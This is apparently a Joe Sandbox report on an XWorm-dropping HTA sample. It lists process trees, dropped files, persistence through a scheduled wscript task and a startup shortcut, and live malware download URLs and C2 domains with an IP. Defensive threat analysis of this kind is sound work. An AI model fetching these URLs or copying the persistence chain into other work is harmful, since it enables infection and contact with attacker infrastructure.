                  Dropped: C:\Users\user\AppData\Local\Temp\temp.bat, ASCII; C:\Users\user\AppData\Local\...\c[1].bat, ASCII
                  cmd.exe 3 2 started
                    Signatures: Suspicious powershell command line found; Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
                    msword.exe started
                      cmd.exe started
                        Dropped: C:\Users\user\AppData\Local\...\Carter.pif, PE32
                        Carter.pif started
                          Dropped: C:\Users\user\AppData\...\DanielPulse.scr, PE32; C:\Users\user\AppData\...\DanielPulse.js, ASCII; C:\Users\user\AppData\Local\...\RegAsm.exe, PE32
                          Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Injects a PE file into a foreign processes
                          cmd.exe started
                            Dropped: C:\Users\user\AppData\...\DanielPulse.url, MS
                            conhost.exe started
                          cmd.exe started
                            conhost.exe started
                            schtasks.exe started
                          RegAsm.exe started
                        conhost.exe started
                        tasklist.exe started
                        7 other processes
                    powershell.exe 15 16 started
                      Dropped: C:\Users\user\AppData\Local\Temp\f.pdf, PDF
                      Signatures: Drops large PE files; Powershell drops PE file
                    powershell.exe started
                      Dropped: C:\Users\user\AppData\Local\...\msword.exe, PE32
                      Signatures: Loading BitLocker PowerShell Module
                    3 other processes
                      Dropped: C:\Users\user\AppData\Local\Temp\msword.zip, Zip
                      AcroCEF.exe 107 started
                        AcroCEF.exe started
                  cmd.exe started
                    conhost.exe started
                    timeout.exe started
                wscript.exe started
                  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  DanielPulse.scr started
                wscript.exe started
                  DanielPulse.scr started

Source | Detection | Scanner | Label | Link
c2.hta | 11% | ReversingLabs | Win32.Exploit.Generic |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | 8% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\msword\msword.exe | 8% | ReversingLabs | |
              No Antivirus matches
Source | Detection | Scanner | Label | Link
me-work.com | 12% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
https://myguyapp.com/c.bat | 0% | Avira URL Cloud | safe |
me-work.com | 0% | Avira URL Cloud | safe |
https://myguyapp.com/msword.zipJ | 0% | Avira URL Cloud | safe |
https://myguyapp.com/ | 0% | Avira URL Cloud | safe |
https://myguyapp.com/msword.zip | 100% | Avira URL Cloud | malware |
https://myguyapp.com/c.batQ; | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROF | 0% | Avira URL Cloud | safe |
https://myguyapp.com/r | 0% | Avira URL Cloud | safe |
https://myguyapp.com/ | 5% | Virustotal | | Browse
https://myguyapp.com/msword.zip | 19% | Virustotal | | Browse
https://myguyapp.com/msword.zipurl2=httpd | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdf# | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdf& | 0% | Avira URL Cloud | safe |
https://myguyapp.com/msword.zipurl2=https://myguyappc | 0% | Avira URL Cloud | safe |
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPR | 0% | Avira URL Cloud | safe |
https://myguyapp.com/c.batO | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdf6 | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdf | 0% | Avira URL Cloud | safe |
https://myguyapp.com/c.batA | 0% | Avira URL Cloud | safe |
https://myguyapp.com/f.pdfx | 0% | Avira URL Cloud | safe |
https://myguyapp.com/msword.zipurl2 | 0% | Avira URL Cloud | safe |
https://myguyapp.com/c.batta | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
me-work.com | 193.26.115.21 | true | true | | unknown
myguyapp.com | 193.26.115.21 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
dwLscOsEZmpbOxr.dwLscOsEZmpbOxr | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://myguyapp.com/msword.zip | true | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://myguyapp.com/c.bat | true | Avira URL Cloud: safe | unknown
me-work.com | true | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://myguyapp.com/ | tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | true | 5%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000024.00000002.2248424669.00000000008F9000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 00000026.00000000.2341454092.0000000000979000.00000002.00000001.01000000.00000011.sdmp, Carter.pif.19.dr | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | false | | high
https://myguyapp.com/msword.zipJ | RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | msword.exe, 0000000F.00000000.2176944096.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.12.dr | false | | high
https://www.autoitscript.com/autoit3/ | msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | false | | high
https://myguyapp.com/c.batQ; | mshta.exe, 00000000.00000002.2190782363.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031F3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROF | tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/r | mshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=httpd | msword.exe, 0000000F.00000002.2240642451.0000000000824000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000003.2239272884.0000000000824000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM | RegAsm.exe, 00000028.00000002.4145039589.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf# | RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf& | cmd.exe, 0000001E.00000002.2218183562.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https://myguyappc | Carter.pif, 0000001C.00000002.4142087918.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPR | RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/c.batO | mshta.exe, 00000000.00000003.2182996805.000000000A667000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdf6 | Carter.pif, 0000001C.00000002.4142975569.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://myguyapp.com/c.batA | mshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/f.pdfx | RegAsm.exe, 00000028.00000002.4142044815.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2 | tasklist.exe, 00000015.00000003.2198184254.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198325078.0000000003201000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2199134054.0000000003480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198974605.0000000003202000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198290497.00000000031F9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/c.batta | mshta.exe, 00000000.00000003.2182501975.0000000003151000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2190431701.0000000003152000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
193.26.115.21 | me-work.com | Netherlands | | 46261 | QUICKPACKETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575551
Start date and time: 2024-12-16 01:32:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: c2.hta
Detection: MAL
Classification: mal100.troj.expl.evad.winHTA@70/82@4/1
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 107
• Number of non-executed functions: 292
Cookbook Comments:
• Found application associated with file extension: .hta
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.195.60.171, 2.19.198.75, 23.32.238.130, 162.159.61.3, 172.64.41.3, 3.233.129.217, 3.219.243.226, 52.22.41.97, 52.6.155.20, 23.195.39.65, 2.22.50.144, 2.22.50.131, 23.195.62.26, 20.12.23.50, 23.195.76.153, 13.107.246.63
• Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Execution Graph export aborted for target mshta.exe, PID 1368 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:33:52 | Task Scheduler | Run new task: Wagner path: wscript s>//B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
00:33:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url
19:32:59 | API Interceptor | 1x Sleep call for process: mshta.exe modified
19:33:02 | API Interceptor | 101x Sleep call for process: powershell.exe modified
19:33:16 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
19:34:24 | API Interceptor | 442x Sleep call for process: timeout.exe modified
19:34:28 | API Interceptor | 2551x Sleep call for process: Carter.pif modified
19:35:41 | API Interceptor | 1032359x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.26.115.21 | c2.hta | malicious | XWorm | myguyapp.com/msword.zip
Match | Associated Sample Name / URL | Detection | Threat Name | Context
me-work.com | c2.hta | malicious | XWorm | 193.26.115.21
me-work.com | c2.hta | malicious | XWorm | 193.26.115.21
me-work.com | c2.hta | malicious | XWorm | 87.120.117.152
me-work.com | p5.hta | malicious | XWorm | 45.88.186.197
myguyapp.com | c2.hta | malicious | XWorm | 193.26.115.21
myguyapp.com | c2.hta | malicious | XWorm | 193.26.115.21
myguyapp.com | EeSNugjFh5.bat | malicious | Unknown | 193.26.115.21
myguyapp.com | c2.hta | malicious | XWorm | 193.26.115.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
QUICKPACKETUS | armv5l.elf | malicious | Mirai | 23.133.3.186
QUICKPACKETUS | elitebotnet.mpsl.elf | malicious | Mirai, Okiru | 23.133.3.168
QUICKPACKETUS | loligang.x86.elf | malicious | Mirai | 185.225.234.108
QUICKPACKETUS | c2.hta | malicious | XWorm | 193.26.115.21
QUICKPACKETUS | c2.hta | malicious | XWorm | 193.26.115.21
QUICKPACKETUS | EeSNugjFh5.bat | malicious | Unknown | 193.26.115.21
QUICKPACKETUS | https://webradiojaguar.net/FNB-POP.pdf | malicious | Unknown | 172.82.129.154
QUICKPACKETUS | c2.hta | malicious | XWorm | 193.26.115.21
QUICKPACKETUS | Play_VM-NowCRQW.html | malicious | HTMLPhisher | 172.82.129.154
QUICKPACKETUS | new.ini.ps1 | malicious | Unknown | 167.88.162.71
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | TD2HjoogPx.dll | malicious | Unknown | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | LaRHzSijsq.exe | malicious | DCRat | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | Whatsapp-GUI.exe | malicious | DarkGate, MailPassView | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | Whatsapp-GUI.exe | malicious | DarkGate, MailPassView | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | RdLfpZY5A9.exe | malicious | 77Rootkit, XWorm | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | FEDEX234598765.html | malicious | WinSearchAbuse | 193.26.115.21
3b5074b1b5d032e5620f69f9f700ff0e | 3edTbzftGf.exe | malicious | Discord Token Stealer, DotStealer | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | lem.exe | malicious | Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | Setup.msi | malicious | Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | wN8pQhRNnu.exe | malicious | LummaC | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | AZCFTWko2q.exe | malicious | LummaC | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 193.26.115.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 193.26.115.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | c2.hta | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | c2.hta | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | c2.hta | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | FwR7as4xUq.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | InsertSr.exe | malicious | GO Backdoor |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | vqMMwqCFZQ.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | fT0L8msd6q.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | fT0L8msd6q.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | qaHUaPUib8.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\220239\Carter.pif | qaHUaPUib8.exe | malicious | Unknown |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | c2.hta | malicious | XWorm |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | c2.hta | malicious | XWorm |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | c2.hta | malicious | XWorm |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | FwR7as4xUq.exe | malicious | Unknown |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | InsertSr.exe | malicious | GO Backdoor |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | vqMMwqCFZQ.exe | malicious | Unknown |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | fT0L8msd6q.exe | malicious | Unknown |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | fT0L8msd6q.exe | malicious | Unknown |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | qaHUaPUib8.exe | malicious | Unknown |
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | qaHUaPUib8.exe | malicious | Unknown |
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.280609857232686
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLDuBW+q2Pwkn2nKuAl9OmbnIFUt8O7nL0Zmw+O7nLUVkwOwkn2nKuAl9Ombjd:7/DuBXvYfHAahFUt8O/0/+O/05JfHAae
                                                                      MD5:5A04E7EA5742F7D17FDCC8AC23ADD501
                                                                      SHA1:51B96B78C7357246D4CD9D49859B772BC3255ABD
                                                                      SHA-256:CDE2996391156CB1FA00BA22C7E3DF7F83EF92AD68EE417F524B9F11F550C648
                                                                      SHA-512:E054F5137EB6F22D786DDF50B43E6C54DE713A1EDA41685FB618DBFB1CD1088F83675AF4018A1E5E0C9D1A8C77F61EF5B671BB9D6429F6EE108B003F9839480F
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.561 1dc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/15-19:33:06.573 1dc8 Recovering log #3.2024/12/15-19:33:06.573 1dc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.280609857232686
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLDuBW+q2Pwkn2nKuAl9OmbnIFUt8O7nL0Zmw+O7nLUVkwOwkn2nKuAl9Ombjd:7/DuBXvYfHAahFUt8O/0/+O/05JfHAae
                                                                      MD5:5A04E7EA5742F7D17FDCC8AC23ADD501
                                                                      SHA1:51B96B78C7357246D4CD9D49859B772BC3255ABD
                                                                      SHA-256:CDE2996391156CB1FA00BA22C7E3DF7F83EF92AD68EE417F524B9F11F550C648
                                                                      SHA-512:E054F5137EB6F22D786DDF50B43E6C54DE713A1EDA41685FB618DBFB1CD1088F83675AF4018A1E5E0C9D1A8C77F61EF5B671BB9D6429F6EE108B003F9839480F
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.561 1dc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/15-19:33:06.573 1dc8 Recovering log #3.2024/12/15-19:33:06.573 1dc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):336
                                                                      Entropy (8bit):5.227762615193555
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLIq2Pwkn2nKuAl9Ombzo2jMGIFUt8O7nLTcZmw+O7nLTifkwOwkn2nKuAl9OU:7/IvYfHAa8uFUt8O/Tc/+O/Tif5JfHAv
                                                                      MD5:81B01F582DCAC4FE045F6C641897C9BD
                                                                      SHA1:C77C158BA9D41653C4CE5A742C39C2819851607D
                                                                      SHA-256:B1FB5A4D48462B52CCD1620C2A7ECD1340E211A30E85A95BA296C209E0086346
                                                                      SHA-512:62BA78E92015F25B814E26312F46E90A905E06B6C609A268A45C784494F96D9077BACDF8CC267218A247CE4BC79BD4E8C1B6B581755C84BDC9FB0E5F81382C25
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.599 1e74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/15-19:33:06.602 1e74 Recovering log #3.2024/12/15-19:33:06.604 1e74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.967403857886107
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                      MD5:B7761633048D74E3C02F61AD04E00147
                                                                      SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                      SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                      SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:modified
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.9526200811043966
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqLXhsBdOg2H5caq3QYiubInP7E4TX:Y2sRdscydMHA3QYhbG7n7
                                                                      MD5:9925F1077DCD49A44A3C847A1C60405B
                                                                      SHA1:D39F9FDB683C04DC4ECE9D0CAD4C10DC70134D9B
                                                                      SHA-256:D543506C84B22F36D384A6581C79ECDE469FC1B31ED18E2D96ECBE6ED87AAAD8
                                                                      SHA-512:7BA0BCCF1B65D78B57B6EFB015D26F975DCAE41F282D356B7EB0E28B7B69283FE8B5D4BDDD528F80BCA100D2FC0AE973330B5E87BFB066429F3871880F3C20AE
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378869198931816","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":628382},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4320
                                                                      Entropy (8bit):5.254435375995293
                                                                      Encrypted:false
                                                                      SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7p911k:etJCV4FiN/jTN/2r8Mta02fEhgO73goI
                                                                      MD5:7DB72E60FBD1F2AA2A1AADB8DCFA4262
                                                                      SHA1:EF8C648D1F164F59A61DC16363C9D4282B5D3784
                                                                      SHA-256:93EE3B02DC1CC22F1BF5BE25B05263FA07ADFD5CD35F8AA832514EC15FD61265
                                                                      SHA-512:8AA7290E21134C813DD6EBB8E5C0C6052B5A782D12A619027BAE06C54C1FA18100C6470B2CF30CA3005A6876B52C46D20F403949E2F74AC41CC40910075746DD
                                                                      Malicious:false
                                                                      Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
